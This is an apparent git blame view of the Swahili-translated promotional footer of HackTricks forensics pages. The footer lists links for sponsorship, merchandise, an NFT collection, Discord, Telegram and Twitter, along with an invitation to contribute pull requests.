Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-09 13:19:32 +00:00			`* Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia [MIPANGO YA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [bidhaa rasmi za PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
Translated ['README.md', 'forensics/basic-forensic-methodology/partition 2024-03-14 23:40:07 +00:00			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au kikundi cha [telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-03-26 15:53:40 +00:00			`* Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`